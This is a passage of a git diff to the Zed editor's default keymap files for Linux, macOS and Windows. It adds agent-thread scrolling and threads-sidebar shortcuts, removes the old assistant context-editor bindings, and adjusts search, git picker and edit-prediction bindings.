"use_key_equivalents": true, @@ -306,12 +284,36 @@ "context": "AcpThread", "bindings": { "ctrl--": "pane::GoBack", + "pageup": "agent::ScrollOutputPageUp", + "pagedown": "agent::ScrollOutputPageDown", + "home": "agent::ScrollOutputToTop", + "end": "agent::ScrollOutputToBottom", + "up": "agent::ScrollOutputLineUp", + "down": "agent::ScrollOutputLineDown", + "shift-pageup": "agent::ScrollOutputToPreviousMessage", + "shift-pagedown": "agent::ScrollOutputToNextMessage", + "ctrl-alt-pageup": "agent::ScrollOutputPageUp", + "ctrl-alt-pagedown": "agent::ScrollOutputPageDown", + "ctrl-alt-home": "agent::ScrollOutputToTop", + "ctrl-alt-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-shift-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-shift-pagedown": "agent::ScrollOutputToNextMessage", }, }, { "context": "AcpThread > Editor", "use_key_equivalents": true, "bindings": { + "ctrl-alt-pageup": "agent::ScrollOutputPageUp", + "ctrl-alt-pagedown": "agent::ScrollOutputPageDown", + "ctrl-alt-home": "agent::ScrollOutputToTop", + "ctrl-alt-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-shift-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-shift-pagedown": "agent::ScrollOutputToNextMessage", "ctrl-shift-r": "agent::OpenAgentDiff", "ctrl-shift-d": "git::Diff", "shift-alt-y": "agent::KeepAll", @@ -336,6 +338,13 @@ "ctrl-alt-.": "agent::ToggleFastMode", }, }, + { + "context": "AcpThread > Editor && mode == full", + "use_key_equivalents": true, + "bindings": { + "alt-enter": "editor::OpenExcerpts", + }, + }, { "context": "AcpThread > Editor && !use_modifier_to_send", "use_key_equivalents": true, @@ -388,6 +397,14 @@ "ctrl-enter": "search::ReplaceAll", }, }, + { + "context": "BufferSearchBar && !in_replace > Editor", + "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, { "context": "BufferSearchBar && !in_replace > Editor", "bindings": { @@ -421,6 +438,12 @@ "ctrl-alt-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "bindings": { @@ -575,6 +598,7 @@ // Change the default action on `menu::Confirm` by setting the parameter // "alt-ctrl-o": ["projects::OpenRecent", { "create_new_window": true }], "alt-ctrl-o": ["projects::OpenRecent", { "create_new_window": false }], + "ctrl-r": ["projects::OpenRecent", { "create_new_window": false }], "alt-shift-open": ["projects::OpenRemote", { "from_existing_connection": false, "create_new_window": false }], // Change to open path modal for existing remote connection by setting the parameter // "alt-ctrl-shift-o": "["projects::OpenRemote", { "from_existing_connection": true }]", @@ -621,6 +645,7 @@ "ctrl-shift-t": "pane::ReopenClosedItem", "ctrl-k ctrl-s": "zed::OpenKeymap", "ctrl-k ctrl-t": "theme_selector::Toggle", + "ctrl-k ctrl-shift-t": "theme::ToggleMode", "ctrl-alt-super-p": "settings_profile_selector::Toggle", "ctrl-t": "project_symbols::Toggle", "ctrl-p": "file_finder::Toggle", @@ -667,10 +692,32 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "ctrl-n": "multi_workspace::NewWorkspaceInWindow", + "ctrl-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", + "enter": "menu::Confirm", + "ctrl-f": "agents_sidebar::FocusSidebarFilter", + "ctrl-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], + }, + }, + { + "context": "ThreadsSidebar && not_searching", + "use_key_equivalents": true, + "bindings": { + "space": "menu::Confirm", + }, + }, + { + "context": "ThreadSwitcher", + "bindings": { + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -760,18 +807,14 @@ "bindings": { "alt-tab": "editor::AcceptEditPrediction", "alt-l": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "alt-k": "editor::AcceptNextWordEditPrediction", "alt-j": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction && edit_prediction_mode == eager && !showing_completions", "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "alt-l": "editor::AcceptEditPrediction", - "alt-k": "editor::AcceptNextWordEditPrediction", - "alt-j": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -813,7 +856,7 @@ }, }, { - "context": "!ContextEditor > Editor && mode == full", + "context": "!AcpThread > Editor && mode == full", "bindings": { "alt-enter": "editor::OpenExcerpts", "shift-enter": "editor::ExpandExcerpts", @@ -889,6 +932,8 @@ "ctrl-alt-c": "project_panel::CopyPath", "alt-shift-copy": "workspace::CopyRelativePath", "alt-ctrl-shift-c": "workspace::CopyRelativePath", + "undo": "project_panel::Undo", + "ctrl-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -913,7 +958,7 @@ }, }, { - "context": "GitPanel && ChangesList", + "context": "GitPanel && ChangesList && !GitBranchSelector", "bindings": { "left": "git_panel::CollapseSelectedEntry", "right": "git_panel::ExpandSelectedEntry", @@ -977,6 +1022,7 @@ "ctrl-shift-enter": "git::Amend", "ctrl-space": "git::StageAll", "ctrl-shift-space": "git::UnstageAll", + "ctrl-k ctrl-r": "git::RestoreAndNext", }, }, { @@ -1041,6 +1087,7 @@ "alt-up": "collab_panel::MoveChannelUp", "alt-down": "collab_panel::MoveChannelDown", "alt-enter": "collab_panel::OpenSelectedChannelNotes", + "shift-enter": "collab_panel::ToggleSelectedChannelFavorite", }, }, { @@ -1101,6 +1148,8 @@ "bindings": { "ctrl-k": "recent_projects::ToggleActionsMenu", "ctrl-shift-a": "workspace::AddFolderToProject", + "shift-backspace": "recent_projects::RemoveSelected", + "ctrl-shift-enter": "recent_projects::AddToWorkspace", }, }, { @@ -1225,6 +1274,10 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "ctrl-home": "markdown::ScrollToTop", + "ctrl-end": "markdown::ScrollToBottom", + "find": "buffer_search::Deploy", + "ctrl-f": "buffer_search::Deploy", }, }, { @@ -1310,6 +1363,16 @@ "bindings": { "ctrl-shift-space": "git::WorktreeFromDefaultOnWindow", "ctrl-space": "git::WorktreeFromDefault", + "ctrl-shift-backspace": "git::DeleteWorktree", + }, + }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "ctrl-,": "zed::OpenSettings", }, }, { @@ -1429,8 +1492,8 @@ { "context": "GitPicker", "bindings": { - "alt-1": "git_picker::ActivateBranchesTab", - "alt-2": "git_picker::ActivateWorktreesTab", + "alt-1": "git_picker::ActivateWorktreesTab", + "alt-2": "git_picker::ActivateBranchesTab", "alt-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 5f210cb4da35f9909767035c941289ee24a2ee3f..c74b5900001a2c798076783b2741aba84ffc4b15 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -39,7 +39,6 @@ "cmd-+": ["zed::IncreaseBufferFontSize", { "persist": false }], "cmd--": ["zed::DecreaseBufferFontSize", { "persist": false }], "cmd-0": ["zed::ResetBufferFontSize", { "persist": false }], - "cmd-,": "zed::OpenSettings", "cmd-alt-,": "zed::OpenSettingsFile", "cmd-q": "zed::Quit", "cmd-h": "zed::Hide", @@ -174,7 +173,6 @@ "cmd-alt-l": ["buffer_search::Deploy", { "selection_search_enabled": true }], "cmd-e": ["buffer_search::Deploy", { "focus": false }], "cmd->": "agent::AddSelectionToThread", - "cmd-<": "assistant::InsertIntoEditor", "cmd-alt-e": "editor::SelectEnclosingSymbol", "alt-enter": "editor::OpenSelectionsInMultibuffer", }, @@ -221,7 +219,7 @@ }, }, { - "context": "Editor && jupyter && !ContextEditor", + "context": "Editor && jupyter", "use_key_equivalents": true, "bindings": { "ctrl-shift-enter": "repl::Run", @@ -242,6 +240,7 @@ "context": "AgentDiff", "use_key_equivalents": true, "bindings": { + "cmd-y": "agent::Keep", "cmd-alt-y": "agent::Keep", "cmd-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", @@ -252,6 +251,7 @@ "context": "Editor && editor_agent_diff", "use_key_equivalents": true, "bindings": { + "cmd-y": "agent::Keep", "cmd-alt-y": "agent::Keep", "cmd-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", @@ -259,31 +259,11 @@ "shift-ctrl-r": "agent::OpenAgentDiff", }, }, - { - "context": "ContextEditor > Editor", - "use_key_equivalents": true, - "bindings": { - "cmd-enter": "assistant::Assist", - "cmd-s": "workspace::Save", - "cmd-<": "assistant::InsertIntoEditor", - "shift-enter": "assistant::Split", - "ctrl-r": "assistant::CycleMessageRole", - "enter": "assistant::ConfirmCommand", - "alt-enter": "editor::Newline", - "cmd-k c": "assistant::CopyCode", - "cmd-g": "search::SelectNextMatch", - "cmd-shift-g": "search::SelectPreviousMatch", - "cmd-k l": "agent::OpenRulesLibrary", - "alt-tab": "agent::CycleFavoriteModels", - "cmd-shift-v": "agent::PasteRaw", - }, - }, { "context": "AgentPanel", "use_key_equivalents": true, "bindings": { "cmd-n": "agent::NewThread", - "cmd-alt-n": "agent::NewTextThread", "cmd-shift-h": "agent::OpenHistory", "cmd-alt-c": "agent::OpenSettings", "cmd-alt-l": "agent::OpenRulesLibrary", @@ -295,6 +275,7 @@ "cmd-shift-j": "agent::ToggleNavigationMenu", "cmd-alt-m": "agent::ToggleOptionsMenu", "cmd-alt-shift-n": "agent::ToggleNewThreadMenu", + "cmd-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "cmd->": "agent::AddSelectionToThread", "cmd-shift-e": "project_panel::ToggleFocus", @@ -302,6 +283,8 @@ "cmd-y": "agent::AllowOnce", "cmd-alt-a": "agent::OpenPermissionDropdown", "cmd-alt-z": "agent::RejectOnce", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -311,14 +294,6 @@ "cmd-c": "markdown::CopyAsMarkdown", }, }, - { - "context": "AgentPanel && text_thread", - "use_key_equivalents": true, - "bindings": { - "cmd-n": "agent::NewTextThread", - "cmd-alt-n": "agent::NewExternalAgentThread", - }, - }, { "context": "AgentPanel && acp_thread", "use_key_equivalents": true, @@ -352,12 +327,36 @@ "context": "AcpThread", "bindings": { "ctrl--": "pane::GoBack", + "pageup": "agent::ScrollOutputPageUp", + "pagedown": "agent::ScrollOutputPageDown", + "home": "agent::ScrollOutputToTop", + "end": "agent::ScrollOutputToBottom", + "up": "agent::ScrollOutputLineUp", + "down": "agent::ScrollOutputLineDown", + "shift-pageup": "agent::ScrollOutputToPreviousMessage", + "shift-pagedown": "agent::ScrollOutputToNextMessage", + "ctrl-pageup": "agent::ScrollOutputPageUp", + "ctrl-pagedown": "agent::ScrollOutputPageDown", + "ctrl-home": "agent::ScrollOutputToTop", + "ctrl-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-pagedown": "agent::ScrollOutputToNextMessage", }, }, { "context": "AcpThread > Editor", "use_key_equivalents": true, "bindings": { + "ctrl-pageup": "agent::ScrollOutputPageUp", + "ctrl-pagedown": "agent::ScrollOutputPageDown", + "ctrl-home": "agent::ScrollOutputToTop", + "ctrl-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-pagedown": "agent::ScrollOutputToNextMessage", "shift-ctrl-r": "agent::OpenAgentDiff", "shift-ctrl-d": "git::Diff", "shift-alt-y": "agent::KeepAll", @@ -380,6 +379,13 @@ "cmd-alt-.": "agent::ToggleFastMode", }, }, + { + "context": "AcpThread > Editor && mode == full", + "use_key_equivalents": true, + "bindings": { + "alt-enter": "editor::OpenExcerpts", + }, + }, { "context": "AcpThread > Editor && !use_modifier_to_send", "use_key_equivalents": true, @@ -443,11 +449,25 @@ { "context": "BufferSearchBar && !in_replace > Editor", "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, + { + "context": "BufferSearchBar && !in_replace > Editor", "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", }, }, + { + "context": "BufferSearchBar || ProjectSearchBar", + "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchBar", "use_key_equivalents": true, @@ -463,7 +483,6 @@ }, { "context": "ProjectSearchBar > Editor", - "use_key_equivalents": true, "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -477,6 +496,12 @@ "cmd-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "use_key_equivalents": true, @@ -643,6 +668,7 @@ // Change the default action on `menu::Confirm` by setting the parameter // "alt-cmd-o": ["projects::OpenRecent", {"create_new_window": true }], "alt-cmd-o": ["projects::OpenRecent", { "create_new_window": false }], + "ctrl-r": ["projects::OpenRecent", { "create_new_window": false }], "ctrl-cmd-o": ["projects::OpenRemote", { "from_existing_connection": false, "create_new_window": false }], "ctrl-cmd-shift-o": ["projects::OpenRemote", { "from_existing_connection": true, "create_new_window": false }], "cmd-ctrl-b": "branches::OpenRecent", @@ -681,6 +707,7 @@ "cmd-shift-t": "pane::ReopenClosedItem", "cmd-k cmd-s": "zed::OpenKeymap", "cmd-k cmd-t": "theme_selector::Toggle", + "cmd-k cmd-shift-t": "theme::ToggleMode", "ctrl-alt-cmd-p": "settings_profile_selector::Toggle", "cmd-t": "project_symbols::Toggle", "cmd-p": "file_finder::Toggle", @@ -728,10 +755,32 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "cmd-n": "multi_workspace::NewWorkspaceInWindow", + "cmd-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", + "enter": "menu::Confirm", + "cmd-f": "agents_sidebar::FocusSidebarFilter", + "cmd-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], + }, + }, + { + "context": "ThreadsSidebar && not_searching", + "use_key_equivalents": true, + "bindings": { + "space": "menu::Confirm", + }, + }, + { + "context": "ThreadSwitcher", + "bindings": { + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -817,18 +866,14 @@ "context": "Editor && edit_prediction", "bindings": { "alt-tab": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction", "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", - "use_key_equivalents": true, + "context": "Editor && edit_prediction && edit_prediction_mode == eager && !showing_completions", "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction", - "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -869,7 +914,7 @@ }, }, { - "context": "!ContextEditor > Editor && mode == full", + "context": "!AcpThread > Editor && mode == full", "use_key_equivalents": true, "bindings": { "alt-enter": "editor::OpenExcerpts", @@ -943,6 +988,7 @@ "cmd-v": "project_panel::Paste", "cmd-alt-c": "workspace::CopyPath", "alt-cmd-shift-c": "workspace::CopyRelativePath", + "cmd-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -981,7 +1027,7 @@ }, }, { - "context": "GitPanel && ChangesList", + "context": "GitPanel && ChangesList && !GitBranchSelector", "use_key_equivalents": true, "bindings": { "up": "git_panel::PreviousEntry", @@ -1021,6 +1067,7 @@ "cmd-shift-enter": "git::Amend", "cmd-ctrl-y": "git::StageAll", "cmd-ctrl-shift-y": "git::UnstageAll", + "cmd-alt-z": "git::RestoreAndNext", }, }, { @@ -1098,6 +1145,7 @@ "alt-up": "collab_panel::MoveChannelUp", "alt-down": "collab_panel::MoveChannelDown", "alt-enter": "collab_panel::OpenSelectedChannelNotes", + "shift-enter": "collab_panel::ToggleSelectedChannelFavorite", }, }, { @@ -1165,6 +1213,8 @@ "bindings": { "cmd-k": "recent_projects::ToggleActionsMenu", "cmd-shift-a": "workspace::AddFolderToProject", + "shift-backspace": "recent_projects::RemoveSelected", + "cmd-shift-enter": "recent_projects::AddToWorkspace", }, }, { @@ -1324,6 +1374,9 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "cmd-up": "markdown::ScrollToTop", + "cmd-down": "markdown::ScrollToBottom", + "cmd-f": "buffer_search::Deploy", }, }, { @@ -1408,6 +1461,16 @@ "bindings": { "ctrl-shift-space": "git::WorktreeFromDefaultOnWindow", "ctrl-space": "git::WorktreeFromDefault", + "cmd-shift-backspace": "git::DeleteWorktree", + }, + }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "cmd-,": "zed::OpenSettings", }, }, { @@ -1500,8 +1563,8 @@ { "context": "GitPicker", "bindings": { - "cmd-1": "git_picker::ActivateBranchesTab", - "cmd-2": "git_picker::ActivateWorktreesTab", + "cmd-1": "git_picker::ActivateWorktreesTab", + "cmd-2": "git_picker::ActivateBranchesTab", "cmd-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 19f75f858cd45192c4cf30dd6bd0799046c26268..a9eb3933423ff60fe60ac391b12773ce7146fb0d 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -30,7 +30,6 @@ "ctrl-shift-=": ["zed::IncreaseBufferFontSize", { "persist": false }], "ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }], "ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }], - "ctrl-,": "zed::OpenSettings", "ctrl-alt-,": "zed::OpenSettingsFile", "ctrl-q": "zed::Quit", "f4": "debugger::Start", @@ -144,7 +143,6 @@ "ctrl-f": "buffer_search::Deploy", "ctrl-h": "buffer_search::DeployReplace", "ctrl-shift-.": "agent::AddSelectionToThread", - "ctrl-shift-,": "assistant::InsertIntoEditor", "shift-alt-e": "editor::SelectEnclosingSymbol", "ctrl-shift-backspace": "editor::GoToPreviousChange", "ctrl-shift-alt-backspace": "editor::GoToNextChange", @@ -183,7 +181,7 @@ }, }, { - "context": "Editor && jupyter && !ContextEditor", + "context": "Editor && jupyter", "use_key_equivalents": true, "bindings": { "ctrl-shift-enter": "repl::Run", @@ -203,6 +201,7 @@ "context": "Editor && editor_agent_diff", "use_key_equivalents": true, "bindings": { + "alt-y": "agent::Keep", "ctrl-alt-y": "agent::Keep", "ctrl-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", @@ -214,36 +213,18 @@ "context": "AgentDiff", "use_key_equivalents": true, "bindings": { + "alt-y": "agent::Keep", "ctrl-alt-y": "agent::Keep", "ctrl-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", "shift-alt-z": "agent::RejectAll", }, }, - { - "context": "ContextEditor > Editor", - "use_key_equivalents": true, - "bindings": { - "ctrl-i": "assistant::Assist", - "ctrl-s": "workspace::Save", - "ctrl-shift-,": "assistant::InsertIntoEditor", - "shift-enter": "assistant::Split", - "ctrl-r": "assistant::CycleMessageRole", - "enter": "assistant::ConfirmCommand", - "alt-enter": "editor::Newline", - "ctrl-k c": "assistant::CopyCode", - "ctrl-g": "search::SelectNextMatch", - "ctrl-shift-g": "search::SelectPreviousMatch", - "ctrl-k l": "agent::OpenRulesLibrary", - "ctrl-shift-v": "agent::PasteRaw", - }, - }, { "context": "AgentPanel", "use_key_equivalents": true, "bindings": { "ctrl-n": "agent::NewThread", - "shift-alt-n": "agent::NewTextThread", "ctrl-shift-h": "agent::OpenHistory", "shift-alt-c": "agent::OpenSettings", "shift-alt-l": "agent::OpenRulesLibrary", @@ -257,13 +238,17 @@ "shift-alt-j": "agent::ToggleNavigationMenu", "shift-alt-i": "agent::ToggleOptionsMenu", "ctrl-shift-alt-n": "agent::ToggleNewThreadMenu", + "ctrl-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "ctrl-shift-.": "agent::AddSelectionToThread", "ctrl-shift-e": "project_panel::ToggleFocus", "ctrl-shift-enter": "agent::ContinueThread", + "shift-alt-q": "agent::AllowAlways", "shift-alt-a": "agent::AllowOnce", "ctrl-alt-a": "agent::OpenPermissionDropdown", - "shift-alt-z": "agent::RejectOnce", + "shift-alt-x": "agent::RejectOnce", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -273,14 +258,6 @@ "ctrl-c": "markdown::CopyAsMarkdown", }, }, - { - "context": "AgentPanel && text_thread", - "use_key_equivalents": true, - "bindings": { - "ctrl-n": "agent::NewTextThread", - "ctrl-alt-t": "agent::NewThread", - }, - }, { "context": "AgentPanel && acp_thread", "use_key_equivalents": true, @@ -308,12 +285,36 @@ "context": "AcpThread", "bindings": { "ctrl--": "pane::GoBack", + "pageup": "agent::ScrollOutputPageUp", + "pagedown": "agent::ScrollOutputPageDown", + "home": "agent::ScrollOutputToTop", + "end": "agent::ScrollOutputToBottom", + "up": "agent::ScrollOutputLineUp", + "down": "agent::ScrollOutputLineDown", + "shift-pageup": "agent::ScrollOutputToPreviousMessage", + "shift-pagedown": "agent::ScrollOutputToNextMessage", + "ctrl-alt-pageup": "agent::ScrollOutputPageUp", + "ctrl-alt-pagedown": "agent::ScrollOutputPageDown", + "ctrl-alt-home": "agent::ScrollOutputToTop", + "ctrl-alt-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-shift-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-shift-pagedown": "agent::ScrollOutputToNextMessage", }, }, { "context": "AcpThread > Editor", "use_key_equivalents": true, "bindings": { + "ctrl-alt-pageup": "agent::ScrollOutputPageUp", + "ctrl-alt-pagedown": "agent::ScrollOutputPageDown", + "ctrl-alt-home": "agent::ScrollOutputToTop", + "ctrl-alt-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-shift-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-shift-pagedown": "agent::ScrollOutputToNextMessage", "ctrl-shift-r": "agent::OpenAgentDiff", "ctrl-shift-d": "git::Diff", "shift-alt-y": "agent::KeepAll", @@ -338,6 +339,13 @@ "ctrl-alt-.": "agent::ToggleFastMode", }, }, + { + "context": "AcpThread > Editor && mode == full", + "use_key_equivalents": true, + "bindings": { + "alt-enter": "editor::OpenExcerpts", + }, + }, { "context": "AcpThread > Editor && !use_modifier_to_send", "use_key_equivalents": true, @@ -395,6 +403,13 @@ { "context": "BufferSearchBar && !in_replace > Editor", "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, + { + "context": "BufferSearchBar && !in_replace > Editor", "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -412,7 +427,6 @@ }, { "context": "ProjectSearchBar > Editor", - "use_key_equivalents": true, "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -426,6 +440,12 @@ "ctrl-alt-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "use_key_equivalents": true, @@ -613,6 +633,7 @@ "ctrl-shift-t": "pane::ReopenClosedItem", "ctrl-k ctrl-s": "zed::OpenKeymap", "ctrl-k ctrl-t": "theme_selector::Toggle", + "ctrl-k ctrl-shift-t": "theme::ToggleMode", "ctrl-alt-super-p": "settings_profile_selector::Toggle", "ctrl-t": "project_symbols::Toggle", "ctrl-p": "file_finder::Toggle", @@ -671,10 +692,32 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "ctrl-n": "multi_workspace::NewWorkspaceInWindow", + "ctrl-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", + "enter": "menu::Confirm", + "ctrl-f": "agents_sidebar::FocusSidebarFilter", + "ctrl-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], + }, + }, + { + "context": "ThreadsSidebar && not_searching", + "use_key_equivalents": true, + "bindings": { + "space": "menu::Confirm", + }, + }, + { + "context": "ThreadSwitcher", + "bindings": { + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -756,19 +799,15 @@ "bindings": { "alt-tab": "editor::AcceptEditPrediction", "alt-l": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "alt-k": "editor::AcceptNextWordEditPrediction", "alt-j": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction && edit_prediction_mode == eager && !showing_completions", "use_key_equivalents": true, "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "alt-l": "editor::AcceptEditPrediction", - "alt-k": "editor::AcceptNextWordEditPrediction", - "alt-j": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -815,7 +854,7 @@ }, }, { - "context": "!ContextEditor > Editor && mode == full", + "context": "!AcpThread > Editor && mode == full", "use_key_equivalents": true, "bindings": { "alt-enter": "editor::OpenExcerpts", @@ -887,6 +926,7 @@ "ctrl-v": "project_panel::Paste", "shift-alt-c": "project_panel::CopyPath", "ctrl-k ctrl-shift-c": "workspace::CopyRelativePath", + "ctrl-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -911,7 +951,7 @@ }, }, { - "context": "GitPanel && ChangesList", + "context": "GitPanel && ChangesList && !GitBranchSelector", "use_key_equivalents": true, "bindings": { "up": "git_panel::PreviousEntry", @@ -978,6 +1018,7 @@ "ctrl-shift-enter": "git::Amend", "ctrl-space": "git::StageAll", "ctrl-shift-space": "git::UnstageAll", + "ctrl-k ctrl-r": "git::RestoreAndNext", }, }, { @@ -1049,6 +1090,7 @@ "alt-up": "collab_panel::MoveChannelUp", "alt-down": "collab_panel::MoveChannelDown", "alt-enter": "collab_panel::OpenSelectedChannelNotes", + "shift-enter": "collab_panel::ToggleSelectedChannelFavorite", }, }, { @@ -1116,6 +1158,8 @@ "bindings": { "ctrl-k": "recent_projects::ToggleActionsMenu", "ctrl-shift-a": "workspace::AddFolderToProject", + "shift-backspace": "recent_projects::RemoveSelected", + "ctrl-shift-enter": "recent_projects::AddToWorkspace", }, }, { @@ -1254,6 +1298,10 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "ctrl-home": "markdown::ScrollToTop", + "ctrl-end": "markdown::ScrollToBottom", + "find": "buffer_search::Deploy", + "ctrl-f": "buffer_search::Deploy", }, }, { @@ -1331,6 +1379,16 @@ "bindings": { "ctrl-shift-space": "git::WorktreeFromDefaultOnWindow", "ctrl-space": "git::WorktreeFromDefault", + "ctrl-shift-backspace": "git::DeleteWorktree", + }, + }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "ctrl-,": "zed::OpenSettings", }, }, { @@ -1422,8 +1480,8 @@ { "context": "GitPicker", "bindings": { - "alt-1": "git_picker::ActivateBranchesTab", - 